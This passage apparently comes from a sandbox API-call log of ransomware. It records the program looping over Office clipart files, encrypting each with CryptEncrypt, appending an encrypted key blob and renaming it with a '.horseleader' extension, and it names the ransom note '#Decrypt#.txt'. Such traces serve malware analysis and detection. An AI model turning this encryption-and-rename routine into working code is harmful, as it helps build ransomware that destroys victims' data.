nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.698] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.698] CloseHandle (hObject=0x158) returned 1 [0252.698] GetProcessHeap () returned 0x780000 [0252.698] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.698] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.horseleader") returned 79 [0252.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf.horseleader")) returned 1 [0252.699] GetProcessHeap () returned 0x780000 [0252.699] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.699] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d83ea00, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d83ea00, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01039_.WMF", cAlternateFileName="")) returned 1 [0252.700] lstrcmpiW (lpString1="AN01039_.WMF", lpString2="Windows") returned -1 [0252.700] wnsprintfW (in: 
pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 67 [0252.700] StrStrIW (lpFirst="AN01039_.WMF", lpSrch=".horseleader") returned 0x0 [0252.700] lstrcmpW (lpString1="AN01039_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.700] lstrcmpW (lpString1="AN01039_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.700] lstrlenW (lpString=".testttjffg") returned 11 [0252.700] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.700] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.700] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.700] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.701] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 67 [0252.701] StrStrW (lpFirst="AN01039_.WMF", lpSrch=".txt") returned 0x0 [0252.701] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3344) returned 1 [0252.701] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd10, lpOverlapped=0x0) returned 1 [0252.705] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff2f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.705] 
WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd10, lpOverlapped=0x0) returned 1 [0252.705] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.706] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.706] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.706] CloseHandle (hObject=0x158) returned 1 [0252.706] GetProcessHeap () returned 0x780000 [0252.706] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.706] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.horseleader") returned 79 [0252.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf.horseleader")) returned 1 [0252.713] GetProcessHeap () returned 0x780000 [0252.713] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.713] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31e92000, 
ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x31e92000, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0x63c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01044_.WMF", cAlternateFileName="")) returned 1 [0252.713] lstrcmpiW (lpString1="AN01044_.WMF", lpString2="Windows") returned -1 [0252.713] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 67 [0252.713] StrStrIW (lpFirst="AN01044_.WMF", lpSrch=".horseleader") returned 0x0 [0252.714] lstrcmpW (lpString1="AN01044_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.714] lstrcmpW (lpString1="AN01044_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.714] lstrlenW (lpString=".testttjffg") returned 11 [0252.714] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.714] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.714] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.714] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.715] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 67 [0252.715] StrStrW (lpFirst="AN01044_.WMF", lpSrch=".txt") returned 0x0 [0252.715] GetFileSizeEx (in: hFile=0x158, 
lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1596) returned 1 [0252.715] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x63c, lpOverlapped=0x0) returned 1 [0252.721] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff9c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.722] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x63c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x63c, lpOverlapped=0x0) returned 1 [0252.722] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.722] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.722] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.722] CloseHandle (hObject=0x158) returned 1 [0252.723] GetProcessHeap () returned 0x780000 [0252.723] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.723] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.horseleader") returned 79 [0252.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\AN01044_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf.horseleader")) returned 1 [0252.724] GetProcessHeap () returned 0x780000 [0252.724] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.724] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1fda300, ftCreationTime.dwHighDateTime=0x1bd4b21, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa1fda300, ftLastWriteTime.dwHighDateTime=0x1bd4b21, nFileSizeHigh=0x0, nFileSizeLow=0x1f20, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01060_.WMF", cAlternateFileName="")) returned 1 [0252.724] lstrcmpiW (lpString1="AN01060_.WMF", lpString2="Windows") returned -1 [0252.724] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 67 [0252.724] StrStrIW (lpFirst="AN01060_.WMF", lpSrch=".horseleader") returned 0x0 [0252.724] lstrcmpW (lpString1="AN01060_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.724] lstrcmpW (lpString1="AN01060_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.724] lstrlenW (lpString=".testttjffg") returned 11 [0252.724] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.724] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.724] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" 
(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.727] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 67 [0252.727] StrStrW (lpFirst="AN01060_.WMF", lpSrch=".txt") returned 0x0 [0252.727] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7968) returned 1 [0252.727] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1f20, lpOverlapped=0x0) returned 1 [0252.729] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe0e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.729] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1f20, lpOverlapped=0x0) returned 1 [0252.729] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.729] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.729] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.729] CloseHandle (hObject=0x158) returned 1 [0252.730] GetProcessHeap () returned 0x780000 [0252.730] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 
[0252.730] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.horseleader") returned 79 [0252.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf.horseleader")) returned 1 [0252.731] GetProcessHeap () returned 0x780000 [0252.731] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.731] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86dd6400, ftCreationTime.dwHighDateTime=0x1bd4b1e, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86dd6400, ftLastWriteTime.dwHighDateTime=0x1bd4b1e, nFileSizeHigh=0x0, nFileSizeLow=0x728, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01084_.WMF", cAlternateFileName="")) returned 1 [0252.731] lstrcmpiW (lpString1="AN01084_.WMF", lpString2="Windows") returned -1 [0252.731] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 67 [0252.731] StrStrIW (lpFirst="AN01084_.WMF", lpSrch=".horseleader") returned 0x0 [0252.731] lstrcmpW (lpString1="AN01084_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.731] lstrcmpW (lpString1="AN01084_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.731] lstrlenW (lpString=".testttjffg") returned 11 [0252.731] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF", lpSrch=".testttjffg") 
returned 0x0 [0252.731] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.731] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.732] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 67 [0252.732] StrStrW (lpFirst="AN01084_.WMF", lpSrch=".txt") returned 0x0 [0252.732] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1832) returned 1 [0252.732] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x728, lpOverlapped=0x0) returned 1 [0252.734] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff8d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.734] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x728, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x728, lpOverlapped=0x0) returned 1 [0252.734] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.734] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) 
returned 1 [0252.735] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.735] CloseHandle (hObject=0x158) returned 1 [0252.735] GetProcessHeap () returned 0x780000 [0252.735] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.735] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.horseleader") returned 79 [0252.735] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf.horseleader")) returned 1 [0252.736] GetProcessHeap () returned 0x780000 [0252.736] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.736] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54406500, ftCreationTime.dwHighDateTime=0x1bd4b38, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54406500, ftLastWriteTime.dwHighDateTime=0x1bd4b38, nFileSizeHigh=0x0, nFileSizeLow=0x66dc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01173_.WMF", cAlternateFileName="")) returned 1 [0252.736] lstrcmpiW (lpString1="AN01173_.WMF", lpString2="Windows") returned -1 [0252.736] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 67 [0252.736] 
StrStrIW (lpFirst="AN01173_.WMF", lpSrch=".horseleader") returned 0x0 [0252.737] lstrcmpW (lpString1="AN01173_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.737] lstrcmpW (lpString1="AN01173_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.737] lstrlenW (lpString=".testttjffg") returned 11 [0252.737] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.737] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.737] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.738] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 67 [0252.739] StrStrW (lpFirst="AN01173_.WMF", lpSrch=".txt") returned 0x0 [0252.739] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=26332) returned 1 [0252.739] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.741] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.742] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.742] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x16dc, lpOverlapped=0x0) returned 1 [0252.742] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe924, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.743] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x16dc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x16dc, lpOverlapped=0x0) returned 1 [0252.743] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.743] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.743] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.743] CloseHandle (hObject=0x158) returned 1 [0252.743] GetProcessHeap () returned 0x780000 [0252.743] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.743] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.horseleader") returned 79 [0252.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\AN01173_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf.horseleader")) returned 1 [0252.744] GetProcessHeap () returned 0x780000 [0252.744] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.744] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x530f3800, ftCreationTime.dwHighDateTime=0x1bd4b38, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x530f3800, ftLastWriteTime.dwHighDateTime=0x1bd4b38, nFileSizeHigh=0x0, nFileSizeLow=0x6cd2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01174_.WMF", cAlternateFileName="")) returned 1 [0252.744] 